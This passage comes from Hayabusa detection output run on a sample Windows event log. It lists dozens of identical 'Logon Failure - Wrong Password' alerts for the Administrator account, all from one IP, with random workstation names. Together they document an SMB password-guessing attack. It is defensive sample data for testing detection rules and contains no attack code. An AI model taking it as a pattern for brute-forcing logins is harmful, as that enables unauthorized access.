NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: 